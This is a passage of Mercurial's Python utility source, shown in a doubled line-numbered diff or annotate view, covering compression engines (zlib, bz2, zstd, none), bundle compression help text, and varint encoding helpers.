3196 def getkey(e):
3196 # Sort first by priority, highest first. In case of tie, sort
3197 # Sort first by priority, highest first. In case of tie, sort
3197 # alphabetically. This is arbitrary, but ensures output is
3198 # alphabetically. This is arbitrary, but ensures output is
3198 # stable.
3199 # stable.
3199 w = e.wireprotosupport()
3200 w = e.wireprotosupport()
3200 return -1 * getattr(w, attr), w.name
3201 return -1 * getattr(w, attr), w.name
3201
3202
3202 return list(sorted(engines, key=getkey))
3203 return list(sorted(engines, key=getkey))
3203
3204
3204 def forwiretype(self, wiretype):
3205 def forwiretype(self, wiretype):
3205 engine = self._engines[self._wiretypes[wiretype]]
3206 engine = self._engines[self._wiretypes[wiretype]]
3206 if not engine.available():
3207 if not engine.available():
3207 raise error.Abort(_('compression engine %s could not be loaded') %
3208 raise error.Abort(_('compression engine %s could not be loaded') %
3208 engine.name())
3209 engine.name())
3209 return engine
3210 return engine
3210
3211
3211 def forrevlogheader(self, header):
3212 def forrevlogheader(self, header):
3212 """Obtain a compression engine registered to a revlog header.
3213 """Obtain a compression engine registered to a revlog header.
3213
3214
3214 Will raise KeyError if the revlog header value isn't registered.
3215 Will raise KeyError if the revlog header value isn't registered.
3215 """
3216 """
3216 return self._engines[self._revlogheaders[header]]
3217 return self._engines[self._revlogheaders[header]]
3217
3218
3218 compengines = compressormanager()
3219 compengines = compressormanager()
3219
3220
3220 class compressionengine(object):
3221 class compressionengine(object):
3221 """Base class for compression engines.
3222 """Base class for compression engines.
3222
3223
3223 Compression engines must implement the interface defined by this class.
3224 Compression engines must implement the interface defined by this class.
3224 """
3225 """
3225 def name(self):
3226 def name(self):
3226 """Returns the name of the compression engine.
3227 """Returns the name of the compression engine.
3227
3228
3228 This is the key the engine is registered under.
3229 This is the key the engine is registered under.
3229
3230
3230 This method must be implemented.
3231 This method must be implemented.
3231 """
3232 """
3232 raise NotImplementedError()
3233 raise NotImplementedError()
3233
3234
3234 def available(self):
3235 def available(self):
3235 """Whether the compression engine is available.
3236 """Whether the compression engine is available.
3236
3237
3237 The intent of this method is to allow optional compression engines
3238 The intent of this method is to allow optional compression engines
3238 that may not be available in all installations (such as engines relying
3239 that may not be available in all installations (such as engines relying
3239 on C extensions that may not be present).
3240 on C extensions that may not be present).
3240 """
3241 """
3241 return True
3242 return True
3242
3243
3243 def bundletype(self):
3244 def bundletype(self):
3244 """Describes bundle identifiers for this engine.
3245 """Describes bundle identifiers for this engine.
3245
3246
3246 If this compression engine isn't supported for bundles, returns None.
3247 If this compression engine isn't supported for bundles, returns None.
3247
3248
3248 If this engine can be used for bundles, returns a 2-tuple of strings of
3249 If this engine can be used for bundles, returns a 2-tuple of strings of
3249 the user-facing "bundle spec" compression name and an internal
3250 the user-facing "bundle spec" compression name and an internal
3250 identifier used to denote the compression format within bundles. To
3251 identifier used to denote the compression format within bundles. To
3251 exclude the name from external usage, set the first element to ``None``.
3252 exclude the name from external usage, set the first element to ``None``.
3252
3253
3253 If bundle compression is supported, the class must also implement
3254 If bundle compression is supported, the class must also implement
3254 ``compressstream`` and `decompressorreader``.
3255 ``compressstream`` and `decompressorreader``.
3255
3256
3256 The docstring of this method is used in the help system to tell users
3257 The docstring of this method is used in the help system to tell users
3257 about this engine.
3258 about this engine.
3258 """
3259 """
3259 return None
3260 return None
3260
3261
3261 def wireprotosupport(self):
3262 def wireprotosupport(self):
3262 """Declare support for this compression format on the wire protocol.
3263 """Declare support for this compression format on the wire protocol.
3263
3264
3264 If this compression engine isn't supported for compressing wire
3265 If this compression engine isn't supported for compressing wire
3265 protocol payloads, returns None.
3266 protocol payloads, returns None.
3266
3267
3267 Otherwise, returns ``compenginewireprotosupport`` with the following
3268 Otherwise, returns ``compenginewireprotosupport`` with the following
3268 fields:
3269 fields:
3269
3270
3270 * String format identifier
3271 * String format identifier
3271 * Integer priority for the server
3272 * Integer priority for the server
3272 * Integer priority for the client
3273 * Integer priority for the client
3273
3274
3274 The integer priorities are used to order the advertisement of format
3275 The integer priorities are used to order the advertisement of format
3275 support by server and client. The highest integer is advertised
3276 support by server and client. The highest integer is advertised
3276 first. Integers with non-positive values aren't advertised.
3277 first. Integers with non-positive values aren't advertised.
3277
3278
3278 The priority values are somewhat arbitrary and only used for default
3279 The priority values are somewhat arbitrary and only used for default
3279 ordering. The relative order can be changed via config options.
3280 ordering. The relative order can be changed via config options.
3280
3281
3281 If wire protocol compression is supported, the class must also implement
3282 If wire protocol compression is supported, the class must also implement
3282 ``compressstream`` and ``decompressorreader``.
3283 ``compressstream`` and ``decompressorreader``.
3283 """
3284 """
3284 return None
3285 return None
3285
3286
3286 def revlogheader(self):
3287 def revlogheader(self):
3287 """Header added to revlog chunks that identifies this engine.
3288 """Header added to revlog chunks that identifies this engine.
3288
3289
3289 If this engine can be used to compress revlogs, this method should
3290 If this engine can be used to compress revlogs, this method should
3290 return the bytes used to identify chunks compressed with this engine.
3291 return the bytes used to identify chunks compressed with this engine.
3291 Else, the method should return ``None`` to indicate it does not
3292 Else, the method should return ``None`` to indicate it does not
3292 participate in revlog compression.
3293 participate in revlog compression.
3293 """
3294 """
3294 return None
3295 return None
3295
3296
3296 def compressstream(self, it, opts=None):
3297 def compressstream(self, it, opts=None):
3297 """Compress an iterator of chunks.
3298 """Compress an iterator of chunks.
3298
3299
3299 The method receives an iterator (ideally a generator) of chunks of
3300 The method receives an iterator (ideally a generator) of chunks of
3300 bytes to be compressed. It returns an iterator (ideally a generator)
3301 bytes to be compressed. It returns an iterator (ideally a generator)
3301 of bytes of chunks representing the compressed output.
3302 of bytes of chunks representing the compressed output.
3302
3303
3303 Optionally accepts an argument defining how to perform compression.
3304 Optionally accepts an argument defining how to perform compression.
3304 Each engine treats this argument differently.
3305 Each engine treats this argument differently.
3305 """
3306 """
3306 raise NotImplementedError()
3307 raise NotImplementedError()
3307
3308
3308 def decompressorreader(self, fh):
3309 def decompressorreader(self, fh):
3309 """Perform decompression on a file object.
3310 """Perform decompression on a file object.
3310
3311
3311 Argument is an object with a ``read(size)`` method that returns
3312 Argument is an object with a ``read(size)`` method that returns
3312 compressed data. Return value is an object with a ``read(size)`` that
3313 compressed data. Return value is an object with a ``read(size)`` that
3313 returns uncompressed data.
3314 returns uncompressed data.
3314 """
3315 """
3315 raise NotImplementedError()
3316 raise NotImplementedError()
3316
3317
3317 def revlogcompressor(self, opts=None):
3318 def revlogcompressor(self, opts=None):
3318 """Obtain an object that can be used to compress revlog entries.
3319 """Obtain an object that can be used to compress revlog entries.
3319
3320
3320 The object has a ``compress(data)`` method that compresses binary
3321 The object has a ``compress(data)`` method that compresses binary
3321 data. This method returns compressed binary data or ``None`` if
3322 data. This method returns compressed binary data or ``None`` if
3322 the data could not be compressed (too small, not compressible, etc).
3323 the data could not be compressed (too small, not compressible, etc).
3323 The returned data should have a header uniquely identifying this
3324 The returned data should have a header uniquely identifying this
3324 compression format so decompression can be routed to this engine.
3325 compression format so decompression can be routed to this engine.
3325 This header should be identified by the ``revlogheader()`` return
3326 This header should be identified by the ``revlogheader()`` return
3326 value.
3327 value.
3327
3328
3328 The object has a ``decompress(data)`` method that decompresses
3329 The object has a ``decompress(data)`` method that decompresses
3329 data. The method will only be called if ``data`` begins with
3330 data. The method will only be called if ``data`` begins with
3330 ``revlogheader()``. The method should return the raw, uncompressed
3331 ``revlogheader()``. The method should return the raw, uncompressed
3331 data or raise a ``RevlogError``.
3332 data or raise a ``RevlogError``.
3332
3333
3333 The object is reusable but is not thread safe.
3334 The object is reusable but is not thread safe.
3334 """
3335 """
3335 raise NotImplementedError()
3336 raise NotImplementedError()
3336
3337
3337 class _zlibengine(compressionengine):
3338 class _zlibengine(compressionengine):
3338 def name(self):
3339 def name(self):
3339 return 'zlib'
3340 return 'zlib'
3340
3341
3341 def bundletype(self):
3342 def bundletype(self):
3342 """zlib compression using the DEFLATE algorithm.
3343 """zlib compression using the DEFLATE algorithm.
3343
3344
3344 All Mercurial clients should support this format. The compression
3345 All Mercurial clients should support this format. The compression
3345 algorithm strikes a reasonable balance between compression ratio
3346 algorithm strikes a reasonable balance between compression ratio
3346 and size.
3347 and size.
3347 """
3348 """
3348 return 'gzip', 'GZ'
3349 return 'gzip', 'GZ'
3349
3350
3350 def wireprotosupport(self):
3351 def wireprotosupport(self):
3351 return compewireprotosupport('zlib', 20, 20)
3352 return compewireprotosupport('zlib', 20, 20)
3352
3353
3353 def revlogheader(self):
3354 def revlogheader(self):
3354 return 'x'
3355 return 'x'
3355
3356
3356 def compressstream(self, it, opts=None):
3357 def compressstream(self, it, opts=None):
3357 opts = opts or {}
3358 opts = opts or {}
3358
3359
3359 z = zlib.compressobj(opts.get('level', -1))
3360 z = zlib.compressobj(opts.get('level', -1))
3360 for chunk in it:
3361 for chunk in it:
3361 data = z.compress(chunk)
3362 data = z.compress(chunk)
3362 # Not all calls to compress emit data. It is cheaper to inspect
3363 # Not all calls to compress emit data. It is cheaper to inspect
3363 # here than to feed empty chunks through generator.
3364 # here than to feed empty chunks through generator.
3364 if data:
3365 if data:
3365 yield data
3366 yield data
3366
3367
3367 yield z.flush()
3368 yield z.flush()
3368
3369
3369 def decompressorreader(self, fh):
3370 def decompressorreader(self, fh):
3370 def gen():
3371 def gen():
3371 d = zlib.decompressobj()
3372 d = zlib.decompressobj()
3372 for chunk in filechunkiter(fh):
3373 for chunk in filechunkiter(fh):
3373 while chunk:
3374 while chunk:
3374 # Limit output size to limit memory.
3375 # Limit output size to limit memory.
3375 yield d.decompress(chunk, 2 ** 18)
3376 yield d.decompress(chunk, 2 ** 18)
3376 chunk = d.unconsumed_tail
3377 chunk = d.unconsumed_tail
3377
3378
3378 return chunkbuffer(gen())
3379 return chunkbuffer(gen())
3379
3380
3380 class zlibrevlogcompressor(object):
3381 class zlibrevlogcompressor(object):
3381 def compress(self, data):
3382 def compress(self, data):
3382 insize = len(data)
3383 insize = len(data)
3383 # Caller handles empty input case.
3384 # Caller handles empty input case.
3384 assert insize > 0
3385 assert insize > 0
3385
3386
3386 if insize < 44:
3387 if insize < 44:
3387 return None
3388 return None
3388
3389
3389 elif insize <= 1000000:
3390 elif insize <= 1000000:
3390 compressed = zlib.compress(data)
3391 compressed = zlib.compress(data)
3391 if len(compressed) < insize:
3392 if len(compressed) < insize:
3392 return compressed
3393 return compressed
3393 return None
3394 return None
3394
3395
3395 # zlib makes an internal copy of the input buffer, doubling
3396 # zlib makes an internal copy of the input buffer, doubling
3396 # memory usage for large inputs. So do streaming compression
3397 # memory usage for large inputs. So do streaming compression
3397 # on large inputs.
3398 # on large inputs.
3398 else:
3399 else:
3399 z = zlib.compressobj()
3400 z = zlib.compressobj()
3400 parts = []
3401 parts = []
3401 pos = 0
3402 pos = 0
3402 while pos < insize:
3403 while pos < insize:
3403 pos2 = pos + 2**20
3404 pos2 = pos + 2**20
3404 parts.append(z.compress(data[pos:pos2]))
3405 parts.append(z.compress(data[pos:pos2]))
3405 pos = pos2
3406 pos = pos2
3406 parts.append(z.flush())
3407 parts.append(z.flush())
3407
3408
3408 if sum(map(len, parts)) < insize:
3409 if sum(map(len, parts)) < insize:
3409 return ''.join(parts)
3410 return ''.join(parts)
3410 return None
3411 return None
3411
3412
3412 def decompress(self, data):
3413 def decompress(self, data):
3413 try:
3414 try:
3414 return zlib.decompress(data)
3415 return zlib.decompress(data)
3415 except zlib.error as e:
3416 except zlib.error as e:
3416 raise error.RevlogError(_('revlog decompress error: %s') %
3417 raise error.RevlogError(_('revlog decompress error: %s') %
3417 stringutil.forcebytestr(e))
3418 stringutil.forcebytestr(e))
3418
3419
3419 def revlogcompressor(self, opts=None):
3420 def revlogcompressor(self, opts=None):
3420 return self.zlibrevlogcompressor()
3421 return self.zlibrevlogcompressor()
3421
3422
3422 compengines.register(_zlibengine())
3423 compengines.register(_zlibengine())
3423
3424
3424 class _bz2engine(compressionengine):
3425 class _bz2engine(compressionengine):
3425 def name(self):
3426 def name(self):
3426 return 'bz2'
3427 return 'bz2'
3427
3428
3428 def bundletype(self):
3429 def bundletype(self):
3429 """An algorithm that produces smaller bundles than ``gzip``.
3430 """An algorithm that produces smaller bundles than ``gzip``.
3430
3431
3431 All Mercurial clients should support this format.
3432 All Mercurial clients should support this format.
3432
3433
3433 This engine will likely produce smaller bundles than ``gzip`` but
3434 This engine will likely produce smaller bundles than ``gzip`` but
3434 will be significantly slower, both during compression and
3435 will be significantly slower, both during compression and
3435 decompression.
3436 decompression.
3436
3437
3437 If available, the ``zstd`` engine can yield similar or better
3438 If available, the ``zstd`` engine can yield similar or better
3438 compression at much higher speeds.
3439 compression at much higher speeds.
3439 """
3440 """
3440 return 'bzip2', 'BZ'
3441 return 'bzip2', 'BZ'
3441
3442
3442 # We declare a protocol name but don't advertise by default because
3443 # We declare a protocol name but don't advertise by default because
3443 # it is slow.
3444 # it is slow.
3444 def wireprotosupport(self):
3445 def wireprotosupport(self):
3445 return compewireprotosupport('bzip2', 0, 0)
3446 return compewireprotosupport('bzip2', 0, 0)
3446
3447
3447 def compressstream(self, it, opts=None):
3448 def compressstream(self, it, opts=None):
3448 opts = opts or {}
3449 opts = opts or {}
3449 z = bz2.BZ2Compressor(opts.get('level', 9))
3450 z = bz2.BZ2Compressor(opts.get('level', 9))
3450 for chunk in it:
3451 for chunk in it:
3451 data = z.compress(chunk)
3452 data = z.compress(chunk)
3452 if data:
3453 if data:
3453 yield data
3454 yield data
3454
3455
3455 yield z.flush()
3456 yield z.flush()
3456
3457
3457 def decompressorreader(self, fh):
3458 def decompressorreader(self, fh):
3458 def gen():
3459 def gen():
3459 d = bz2.BZ2Decompressor()
3460 d = bz2.BZ2Decompressor()
3460 for chunk in filechunkiter(fh):
3461 for chunk in filechunkiter(fh):
3461 yield d.decompress(chunk)
3462 yield d.decompress(chunk)
3462
3463
3463 return chunkbuffer(gen())
3464 return chunkbuffer(gen())
3464
3465
3465 compengines.register(_bz2engine())
3466 compengines.register(_bz2engine())
3466
3467
3467 class _truncatedbz2engine(compressionengine):
3468 class _truncatedbz2engine(compressionengine):
3468 def name(self):
3469 def name(self):
3469 return 'bz2truncated'
3470 return 'bz2truncated'
3470
3471
3471 def bundletype(self):
3472 def bundletype(self):
3472 return None, '_truncatedBZ'
3473 return None, '_truncatedBZ'
3473
3474
3474 # We don't implement compressstream because it is hackily handled elsewhere.
3475 # We don't implement compressstream because it is hackily handled elsewhere.
3475
3476
3476 def decompressorreader(self, fh):
3477 def decompressorreader(self, fh):
3477 def gen():
3478 def gen():
3478 # The input stream doesn't have the 'BZ' header. So add it back.
3479 # The input stream doesn't have the 'BZ' header. So add it back.
3479 d = bz2.BZ2Decompressor()
3480 d = bz2.BZ2Decompressor()
3480 d.decompress('BZ')
3481 d.decompress('BZ')
3481 for chunk in filechunkiter(fh):
3482 for chunk in filechunkiter(fh):
3482 yield d.decompress(chunk)
3483 yield d.decompress(chunk)
3483
3484
3484 return chunkbuffer(gen())
3485 return chunkbuffer(gen())
3485
3486
3486 compengines.register(_truncatedbz2engine())
3487 compengines.register(_truncatedbz2engine())
3487
3488
3488 class _noopengine(compressionengine):
3489 class _noopengine(compressionengine):
3489 def name(self):
3490 def name(self):
3490 return 'none'
3491 return 'none'
3491
3492
3492 def bundletype(self):
3493 def bundletype(self):
3493 """No compression is performed.
3494 """No compression is performed.
3494
3495
3495 Use this compression engine to explicitly disable compression.
3496 Use this compression engine to explicitly disable compression.
3496 """
3497 """
3497 return 'none', 'UN'
3498 return 'none', 'UN'
3498
3499
3499 # Clients always support uncompressed payloads. Servers don't because
3500 # Clients always support uncompressed payloads. Servers don't because
3500 # unless you are on a fast network, uncompressed payloads can easily
3501 # unless you are on a fast network, uncompressed payloads can easily
3501 # saturate your network pipe.
3502 # saturate your network pipe.
3502 def wireprotosupport(self):
3503 def wireprotosupport(self):
3503 return compewireprotosupport('none', 0, 10)
3504 return compewireprotosupport('none', 0, 10)
3504
3505
3505 # We don't implement revlogheader because it is handled specially
3506 # We don't implement revlogheader because it is handled specially
3506 # in the revlog class.
3507 # in the revlog class.
3507
3508
3508 def compressstream(self, it, opts=None):
3509 def compressstream(self, it, opts=None):
3509 return it
3510 return it
3510
3511
3511 def decompressorreader(self, fh):
3512 def decompressorreader(self, fh):
3512 return fh
3513 return fh
3513
3514
3514 class nooprevlogcompressor(object):
3515 class nooprevlogcompressor(object):
3515 def compress(self, data):
3516 def compress(self, data):
3516 return None
3517 return None
3517
3518
3518 def revlogcompressor(self, opts=None):
3519 def revlogcompressor(self, opts=None):
3519 return self.nooprevlogcompressor()
3520 return self.nooprevlogcompressor()
3520
3521
3521 compengines.register(_noopengine())
3522 compengines.register(_noopengine())
3522
3523
3523 class _zstdengine(compressionengine):
3524 class _zstdengine(compressionengine):
3524 def name(self):
3525 def name(self):
3525 return 'zstd'
3526 return 'zstd'
3526
3527
3527 @propertycache
3528 @propertycache
3528 def _module(self):
3529 def _module(self):
3529 # Not all installs have the zstd module available. So defer importing
3530 # Not all installs have the zstd module available. So defer importing
3530 # until first access.
3531 # until first access.
3531 try:
3532 try:
3532 from . import zstd
3533 from . import zstd
3533 # Force delayed import.
3534 # Force delayed import.
3534 zstd.__version__
3535 zstd.__version__
3535 return zstd
3536 return zstd
3536 except ImportError:
3537 except ImportError:
3537 return None
3538 return None
3538
3539
3539 def available(self):
3540 def available(self):
3540 return bool(self._module)
3541 return bool(self._module)
3541
3542
3542 def bundletype(self):
3543 def bundletype(self):
3543 """A modern compression algorithm that is fast and highly flexible.
3544 """A modern compression algorithm that is fast and highly flexible.
3544
3545
3545 Only supported by Mercurial 4.1 and newer clients.
3546 Only supported by Mercurial 4.1 and newer clients.
3546
3547
3547 With the default settings, zstd compression is both faster and yields
3548 With the default settings, zstd compression is both faster and yields
3548 better compression than ``gzip``. It also frequently yields better
3549 better compression than ``gzip``. It also frequently yields better
3549 compression than ``bzip2`` while operating at much higher speeds.
3550 compression than ``bzip2`` while operating at much higher speeds.
3550
3551
3551 If this engine is available and backwards compatibility is not a
3552 If this engine is available and backwards compatibility is not a
3552 concern, it is likely the best available engine.
3553 concern, it is likely the best available engine.
3553 """
3554 """
3554 return 'zstd', 'ZS'
3555 return 'zstd', 'ZS'
3555
3556
3556 def wireprotosupport(self):
3557 def wireprotosupport(self):
3557 return compewireprotosupport('zstd', 50, 50)
3558 return compewireprotosupport('zstd', 50, 50)
3558
3559
3559 def revlogheader(self):
3560 def revlogheader(self):
3560 return '\x28'
3561 return '\x28'
3561
3562
3562 def compressstream(self, it, opts=None):
3563 def compressstream(self, it, opts=None):
3563 opts = opts or {}
3564 opts = opts or {}
3564 # zstd level 3 is almost always significantly faster than zlib
3565 # zstd level 3 is almost always significantly faster than zlib
3565 # while providing no worse compression. It strikes a good balance
3566 # while providing no worse compression. It strikes a good balance
3566 # between speed and compression.
3567 # between speed and compression.
3567 level = opts.get('level', 3)
3568 level = opts.get('level', 3)
3568
3569
3569 zstd = self._module
3570 zstd = self._module
3570 z = zstd.ZstdCompressor(level=level).compressobj()
3571 z = zstd.ZstdCompressor(level=level).compressobj()
3571 for chunk in it:
3572 for chunk in it:
3572 data = z.compress(chunk)
3573 data = z.compress(chunk)
3573 if data:
3574 if data:
3574 yield data
3575 yield data
3575
3576
3576 yield z.flush()
3577 yield z.flush()
3577
3578
3578 def decompressorreader(self, fh):
3579 def decompressorreader(self, fh):
3579 zstd = self._module
3580 zstd = self._module
3580 dctx = zstd.ZstdDecompressor()
3581 dctx = zstd.ZstdDecompressor()
3581 return chunkbuffer(dctx.read_from(fh))
3582 return chunkbuffer(dctx.read_from(fh))
3582
3583
3583 class zstdrevlogcompressor(object):
3584 class zstdrevlogcompressor(object):
3584 def __init__(self, zstd, level=3):
3585 def __init__(self, zstd, level=3):
3585 # TODO consider omitting frame magic to save 4 bytes.
3586 # TODO consider omitting frame magic to save 4 bytes.
3586 # This writes content sizes into the frame header. That is
3587 # This writes content sizes into the frame header. That is
3587 # extra storage. But it allows a correct size memory allocation
3588 # extra storage. But it allows a correct size memory allocation
3588 # to hold the result.
3589 # to hold the result.
3589 self._cctx = zstd.ZstdCompressor(level=level)
3590 self._cctx = zstd.ZstdCompressor(level=level)
3590 self._dctx = zstd.ZstdDecompressor()
3591 self._dctx = zstd.ZstdDecompressor()
3591 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3592 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3592 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3593 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3593
3594
3594 def compress(self, data):
3595 def compress(self, data):
3595 insize = len(data)
3596 insize = len(data)
3596 # Caller handles empty input case.
3597 # Caller handles empty input case.
3597 assert insize > 0
3598 assert insize > 0
3598
3599
3599 if insize < 50:
3600 if insize < 50:
3600 return None
3601 return None
3601
3602
3602 elif insize <= 1000000:
3603 elif insize <= 1000000:
3603 compressed = self._cctx.compress(data)
3604 compressed = self._cctx.compress(data)
3604 if len(compressed) < insize:
3605 if len(compressed) < insize:
3605 return compressed
3606 return compressed
3606 return None
3607 return None
3607 else:
3608 else:
3608 z = self._cctx.compressobj()
3609 z = self._cctx.compressobj()
3609 chunks = []
3610 chunks = []
3610 pos = 0
3611 pos = 0
3611 while pos < insize:
3612 while pos < insize:
3612 pos2 = pos + self._compinsize
3613 pos2 = pos + self._compinsize
3613 chunk = z.compress(data[pos:pos2])
3614 chunk = z.compress(data[pos:pos2])
3614 if chunk:
3615 if chunk:
3615 chunks.append(chunk)
3616 chunks.append(chunk)
3616 pos = pos2
3617 pos = pos2
3617 chunks.append(z.flush())
3618 chunks.append(z.flush())
3618
3619
3619 if sum(map(len, chunks)) < insize:
3620 if sum(map(len, chunks)) < insize:
3620 return ''.join(chunks)
3621 return ''.join(chunks)
3621 return None
3622 return None
3622
3623
3623 def decompress(self, data):
3624 def decompress(self, data):
3624 insize = len(data)
3625 insize = len(data)
3625
3626
3626 try:
3627 try:
3627 # This was measured to be faster than other streaming
3628 # This was measured to be faster than other streaming
3628 # decompressors.
3629 # decompressors.
3629 dobj = self._dctx.decompressobj()
3630 dobj = self._dctx.decompressobj()
3630 chunks = []
3631 chunks = []
3631 pos = 0
3632 pos = 0
3632 while pos < insize:
3633 while pos < insize:
3633 pos2 = pos + self._decompinsize
3634 pos2 = pos + self._decompinsize
3634 chunk = dobj.decompress(data[pos:pos2])
3635 chunk = dobj.decompress(data[pos:pos2])
3635 if chunk:
3636 if chunk:
3636 chunks.append(chunk)
3637 chunks.append(chunk)
3637 pos = pos2
3638 pos = pos2
3638 # Frame should be exhausted, so no finish() API.
3639 # Frame should be exhausted, so no finish() API.
3639
3640
3640 return ''.join(chunks)
3641 return ''.join(chunks)
3641 except Exception as e:
3642 except Exception as e:
3642 raise error.RevlogError(_('revlog decompress error: %s') %
3643 raise error.RevlogError(_('revlog decompress error: %s') %
3643 stringutil.forcebytestr(e))
3644 stringutil.forcebytestr(e))
3644
3645
3645 def revlogcompressor(self, opts=None):
3646 def revlogcompressor(self, opts=None):
3646 opts = opts or {}
3647 opts = opts or {}
3647 return self.zstdrevlogcompressor(self._module,
3648 return self.zstdrevlogcompressor(self._module,
3648 level=opts.get('level', 3))
3649 level=opts.get('level', 3))
3649
3650
3650 compengines.register(_zstdengine())
3651 compengines.register(_zstdengine())
3651
3652
3652 def bundlecompressiontopics():
3653 def bundlecompressiontopics():
3653 """Obtains a list of available bundle compressions for use in help."""
3654 """Obtains a list of available bundle compressions for use in help."""
3654 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3655 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3655 items = {}
3656 items = {}
3656
3657
3657 # We need to format the docstring. So use a dummy object/type to hold it
3658 # We need to format the docstring. So use a dummy object/type to hold it
3658 # rather than mutating the original.
3659 # rather than mutating the original.
3659 class docobject(object):
3660 class docobject(object):
3660 pass
3661 pass
3661
3662
3662 for name in compengines:
3663 for name in compengines:
3663 engine = compengines[name]
3664 engine = compengines[name]
3664
3665
3665 if not engine.available():
3666 if not engine.available():
3666 continue
3667 continue
3667
3668
3668 bt = engine.bundletype()
3669 bt = engine.bundletype()
3669 if not bt or not bt[0]:
3670 if not bt or not bt[0]:
3670 continue
3671 continue
3671
3672
3672 doc = pycompat.sysstr('``%s``\n %s') % (
3673 doc = pycompat.sysstr('``%s``\n %s') % (
3673 bt[0], engine.bundletype.__doc__)
3674 bt[0], engine.bundletype.__doc__)
3674
3675
3675 value = docobject()
3676 value = docobject()
3676 value.__doc__ = doc
3677 value.__doc__ = doc
3677 value._origdoc = engine.bundletype.__doc__
3678 value._origdoc = engine.bundletype.__doc__
3678 value._origfunc = engine.bundletype
3679 value._origfunc = engine.bundletype
3679
3680
3680 items[bt[0]] = value
3681 items[bt[0]] = value
3681
3682
3682 return items
3683 return items
3683
3684
3684 i18nfunctions = bundlecompressiontopics().values()
3685 i18nfunctions = bundlecompressiontopics().values()
3685
3686
3686 # convenient shortcut
3687 # convenient shortcut
3687 dst = debugstacktrace
3688 dst = debugstacktrace
3688
3689
3689 def safename(f, tag, ctx, others=None):
3690 def safename(f, tag, ctx, others=None):
3690 """
3691 """
3691 Generate a name that it is safe to rename f to in the given context.
3692 Generate a name that it is safe to rename f to in the given context.
3692
3693
3693 f: filename to rename
3694 f: filename to rename
3694 tag: a string tag that will be included in the new name
3695 tag: a string tag that will be included in the new name
3695 ctx: a context, in which the new name must not exist
3696 ctx: a context, in which the new name must not exist
3696 others: a set of other filenames that the new name must not be in
3697 others: a set of other filenames that the new name must not be in
3697
3698
3698 Returns a file name of the form oldname~tag[~number] which does not exist
3699 Returns a file name of the form oldname~tag[~number] which does not exist
3699 in the provided context and is not in the set of other names.
3700 in the provided context and is not in the set of other names.
3700 """
3701 """
3701 if others is None:
3702 if others is None:
3702 others = set()
3703 others = set()
3703
3704
3704 fn = '%s~%s' % (f, tag)
3705 fn = '%s~%s' % (f, tag)
3705 if fn not in ctx and fn not in others:
3706 if fn not in ctx and fn not in others:
3706 return fn
3707 return fn
3707 for n in itertools.count(1):
3708 for n in itertools.count(1):
3708 fn = '%s~%s~%s' % (f, tag, n)
3709 fn = '%s~%s~%s' % (f, tag, n)
3709 if fn not in ctx and fn not in others:
3710 if fn not in ctx and fn not in others:
3710 return fn
3711 return fn
3711
3712
3712 def readexactly(stream, n):
3713 def readexactly(stream, n):
3713 '''read n bytes from stream.read and abort if less was available'''
3714 '''read n bytes from stream.read and abort if less was available'''
3714 s = stream.read(n)
3715 s = stream.read(n)
3715 if len(s) < n:
3716 if len(s) < n:
3716 raise error.Abort(_("stream ended unexpectedly"
3717 raise error.Abort(_("stream ended unexpectedly"
3717 " (got %d bytes, expected %d)")
3718 " (got %d bytes, expected %d)")
3718 % (len(s), n))
3719 % (len(s), n))
3719 return s
3720 return s
3720
3721
3721 def uvarintencode(value):
3722 def uvarintencode(value):
3722 """Encode an unsigned integer value to a varint.
3723 """Encode an unsigned integer value to a varint.
3723
3724
3724 A varint is a variable length integer of 1 or more bytes. Each byte
3725 A varint is a variable length integer of 1 or more bytes. Each byte
3725 except the last has the most significant bit set. The lower 7 bits of
3726 except the last has the most significant bit set. The lower 7 bits of
3726 each byte store the 2's complement representation, least significant group
3727 each byte store the 2's complement representation, least significant group
3727 first.
3728 first.
3728
3729
3729 >>> uvarintencode(0)
3730 >>> uvarintencode(0)
3730 '\\x00'
3731 '\\x00'
3731 >>> uvarintencode(1)
3732 >>> uvarintencode(1)
3732 '\\x01'
3733 '\\x01'
3733 >>> uvarintencode(127)
3734 >>> uvarintencode(127)
3734 '\\x7f'
3735 '\\x7f'
3735 >>> uvarintencode(1337)
3736 >>> uvarintencode(1337)
3736 '\\xb9\\n'
3737 '\\xb9\\n'
3737 >>> uvarintencode(65536)
3738 >>> uvarintencode(65536)
3738 '\\x80\\x80\\x04'
3739 '\\x80\\x80\\x04'
3739 >>> uvarintencode(-1)
3740 >>> uvarintencode(-1)
3740 Traceback (most recent call last):
3741 Traceback (most recent call last):
3741 ...
3742 ...
3742 ProgrammingError: negative value for uvarint: -1
3743 ProgrammingError: negative value for uvarint: -1
3743 """
3744 """
3744 if value < 0:
3745 if value < 0:
3745 raise error.ProgrammingError('negative value for uvarint: %d'
3746 raise error.ProgrammingError('negative value for uvarint: %d'
3746 % value)
3747 % value)
3747 bits = value & 0x7f
3748 bits = value & 0x7f
3748 value >>= 7
3749 value >>= 7
3749 bytes = []
3750 bytes = []
3750 while value:
3751 while value:
3751 bytes.append(pycompat.bytechr(0x80 | bits))
3752 bytes.append(pycompat.bytechr(0x80 | bits))
3752 bits = value & 0x7f
3753 bits = value & 0x7f
3753 value >>= 7
3754 value >>= 7
3754 bytes.append(pycompat.bytechr(bits))
3755 bytes.append(pycompat.bytechr(bits))
3755
3756
3756 return ''.join(bytes)
3757 return ''.join(bytes)
3757
3758
3758 def uvarintdecodestream(fh):
3759 def uvarintdecodestream(fh):
3759 """Decode an unsigned variable length integer from a stream.
3760 """Decode an unsigned variable length integer from a stream.
3760
3761
3761 The passed argument is anything that has a ``.read(N)`` method.
3762 The passed argument is anything that has a ``.read(N)`` method.
3762
3763
3763 >>> try:
3764 >>> try:
3764 ... from StringIO import StringIO as BytesIO
3765 ... from StringIO import StringIO as BytesIO
3765 ... except ImportError:
3766 ... except ImportError:
3766 ... from io import BytesIO
3767 ... from io import BytesIO
3767 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3768 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3768 0
3769 0
3769 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3770 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3770 1
3771 1
